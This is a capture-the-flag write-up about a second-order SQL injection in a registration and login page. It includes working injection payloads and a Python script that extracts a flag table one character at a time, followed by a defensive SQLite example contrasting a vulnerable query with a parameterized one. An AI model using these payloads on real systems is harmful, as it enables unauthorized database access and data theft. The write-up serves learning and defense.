- Title description: SQL injection
- Visiting the site gives a login page
- Scanned it with dirsearch
- Visit register.php
- Registered an account and logged in; it just returns to the login page, which seems useless
- But here I remembered an injection method I had mentioned when writing up the basics of SQL injection but had not studied carefully:
second-order injection
- The injection point here should be the username on the
register.php
page
- Because the email and password still have to be used when logging in
- For details, please see my previous article
- Registering with a single quote failed, so I changed the username to
root' and '1
and this time the registration succeeded
- That is to say, the closing here is done with a single quote, and there is no addslashes() escaping of the kind I had learned about before.
- After logging in at this point, the displayed username is 0
- So there must be SQL injection here, but when I tried registering the name as
1' union select 1,database()#
- it again returned only
nnnnoooo!!!!
which means there is still a filter here???
- So it is necessary to fuzz with Burp Suite
- A lot of things are filtered; even
information_schema
is filtered out. I honestly did not know how to proceed.
- Helplessly turned to the writeup (wp)
- The script from the expert's writeup is attached
import requests
import re

# Target URLs as given in the writeup
register_url = 'http://111.200.241.244:45701/register.php'
login_url = 'http://111.200.241.244:45701/login.php'

for i in range(1, 100):
    # Each iteration registers a fresh account (unique email) whose username is an
    # SQL expression that evaluates to the ASCII code of the i-th flag character
    register_data = {
        'email': '[email protected]%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': 'admin'
    }
    res = requests.post(url=register_url, data=register_data)
    # Logging in makes login.php evaluate the stored username (second-order injection)
    login_data = {
        'email': '[email protected]%d' % i,
        'password': 'admin'
    }
    res_ = requests.post(url=login_url, data=login_data)
    # The rendered "user name" is the numeric result of the expression
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    print(chr(int(code.group(1))), end='')
- The following is my own understanding
- Since it is the username that is injected in the second order, and
information_schema
is filtered, union-based injection is definitely not possible.
- The role of + in MySQL is to convert strings into numbers and add them, for example:
'1' + '1a'
'0' + database()
'0' + substr(database(),1,1)
- So the core injection code is
"0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
- After that, the username value shown on the login.php page is extracted with a regex; it is the ASCII code of each character of the flag.
- I need to add to my knowledge of MySQL. What I learned before is not enough for the current challenge...
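To make the second-order flow concrete from the defender's side, here is an added example (not the challenge's code or the writeup's script) that models the register/login pair with SQLite: registration is parameterized and stores the username harmlessly, but a later query splices the stored value into SQL, which is exactly the bug. The schema, the flag table and the `login_fixed` variant are assumptions; SQLite's unicode() stands in for MySQL's ascii().

```python
import sqlite3

# Constructed stand-in for the challenge database; the real schema is not on the page.
SCHEMA = """
CREATE TABLE users (email TEXT PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE flag (flag TEXT);
INSERT INTO flag VALUES ('flag{constructed}');
"""

def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def register(db, email, username, password):
    # Registration is parameterized: the payload is stored verbatim as data and
    # does nothing yet. That is why the registration "succeeds".
    db.execute("INSERT INTO users VALUES (?, ?, ?)", (email, username, password))

def _stored_username(db, email, password):
    row = db.execute("SELECT username FROM users WHERE email = ? AND password = ?",
                     (email, password)).fetchone()
    return None if row is None else row[0]

def login_vulnerable(db, email, password):
    # Second-order bug: the stored username is trusted and spliced into a new
    # statement, so the database evaluates it as an SQL expression.
    name = _stored_username(db, email, password)
    if name is None:
        return None
    return db.execute("SELECT '%s' AS display_name" % name).fetchone()[0]

def login_fixed(db, email, password):
    # Same flow, but the stored value is bound as a parameter: data, not SQL.
    name = _stored_username(db, email, password)
    if name is None:
        return None
    return db.execute("SELECT ? AS display_name", (name,)).fetchone()[0]

def demo():
    db = new_db()
    # The writeup's probe "root' and '1" renders as 0 once it is evaluated.
    register(db, "a@example.test", "root' and '1", "pw")
    # The writeup's coercion payload; SQLite's unicode() stands in for MySQL ascii().
    register(db, "b@example.test",
             "0' + unicode(substr((select flag from flag), 1, 1)) + '0", "pw")
    return {"probe_vuln": login_vulnerable(db, "a@example.test", "pw"),
            "probe_fixed": login_fixed(db, "a@example.test", "pw"),
            "leak_vuln": login_vulnerable(db, "b@example.test", "pw"),
            "leak_fixed": login_fixed(db, "b@example.test", "pw")}
```

The parameterized login returns the stored string untouched, which is the whole fix: the value is never re-parsed as SQL, so no filter list on the registration side is needed.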